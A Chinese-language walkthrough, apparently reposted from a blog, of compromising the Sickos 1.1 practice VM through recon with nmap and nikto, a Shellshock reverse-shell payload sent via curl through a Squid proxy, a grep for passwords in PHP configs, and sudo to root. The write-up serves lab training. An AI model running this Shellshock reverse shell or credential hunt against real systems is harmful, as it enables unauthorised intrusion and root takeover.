当前位置: 代码迷 >> 综合 >> OSCP Sickos 1.1 靶机渗透
  详细解决方案

OSCP Sickos 1.1 靶机渗透

热度:90   发布时间:2023-10-22 01:57:14.0

Sickos 1.1 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-23

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

Sickos 1.1主机ip为172.16.1.10

OSCP Sickos 1.1 靶机渗透

nmap 扫描一下

nmap -p- -A 172.16.1.10

OSCP Sickos 1.1 靶机渗透

主机开放了代理服务器,我们尝试用代理服务器扫描

nikto -h 172.16.1.10 --useproxy 172.16.1.10:3128

OSCP Sickos 1.1 靶机渗透

发现robots.txt 我们设置代理服务器查看文件

OSCP Sickos 1.1 靶机渗透

OSCP Sickos 1.1 靶机渗透

发现了/wolfcms目录,打开看看,没什么可用的,我们回到刚才nikto检测结果,提示/cgi-bin/status 对shellcode易受威胁,我们看下能否反弹shell

OSCP Sickos 1.1 靶机渗透

二、web渗透

开启msf监听

msfconsole

use multi/handler

set lhost 172.16.1.4

set lport 4444

set payload linux/x86/shell/reverse_tcp

run

开启另一个窗口发起请求,准备反弹shell

curl -v --proxy 172.16.1.10:3128 http://172.16.1.10/cgi-bin/status -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/172.16.1.4/4444 0>&1"

OSCP Sickos 1.1 靶机渗透

成功反弹shell

OSCP Sickos 1.1 靶机渗透

三、提权

切换交互式shell 

/bin/sh

查看passwd文件,发现sickos用户

cat /etc/passwd

OSCP Sickos 1.1 靶机渗透

尝试寻找密码

find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C 3 -i pass

OSCP Sickos 1.1 靶机渗透

配置文件里面竟然有密码,为john@123

尝试切换用户

su sickos

成功切换到sickos用户

OSCP Sickos 1.1 靶机渗透

使用sudo命令切换到root用户

sudo su root

OSCP Sickos 1.1 靶机渗透

成功切换到root用户

四、总结

总体来说没什么难度